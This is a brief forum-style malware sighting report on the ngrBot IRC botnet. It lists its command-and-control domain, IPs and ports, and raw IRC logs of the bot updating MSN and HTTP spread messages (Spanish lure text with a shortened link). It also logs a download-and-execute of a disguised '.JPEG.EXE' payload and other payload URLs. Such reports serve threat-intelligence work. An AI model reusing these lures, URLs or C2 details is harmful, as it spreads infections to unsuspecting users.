Looks like ngrBot the reptile mod made by fubar and jam3s is spreading alot
Resolved : [jskd6c.jumpingcrab.com] To [184.107.143.126]
Remote Host Port Number
184.107.143.126 2009 and 6667 PASS ngrBot
213.251.170.52 80
70.85.227.66 80
PRIVMSG #root :[HTTP]: Updated HTTP spread message to “juas juaz mira esto bajalo 😀 http://bit.ly/kgPE5S”
PRIVMSG #root :[d=”http://www.befordsouthpointford.com/bfam/Ford.Mustang.Cobra.2011.JPEG.EXE” s=”143360 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.tmp” – Download retries: 0
PONG :irc.sudominio.org
NICK n{US|XPa}rzvzsak
USER rzvzsak 0 0 :rzvzsak
JOIN #root 301189
PRIVMSG #root :[MSN]: Updated MSN spread interval to “1”
PRIVMSG #root :[MSN]: Updated MSN spread message to “jijiji mira 😀 bajalo 😀 http://bit.ly/kgPE5S”
PRIVMSG #root :[HTTP]: Updated HTTP spread interval to “1”
* The data identified by the following URLs was then requested from the remote web server:
o http://api.wipmania.com/
o http://www.befordsouthpointford.com/bfam/Ford.Mustang.Cobra.2011.JPEG.EXE
o http://www.befordsouthpointford.com/bfam/llllllllll.EXE
Crypter used to protect the bot:
C:UsersM4xDocumentsProgrammierenPECRYPTClientEXECUTABLELoader_StubReleaseLoader_Stub.pdb
Detection:
2/41 in virustotal
hosting infos:
http://whois.domaintools.com/184.107.143.126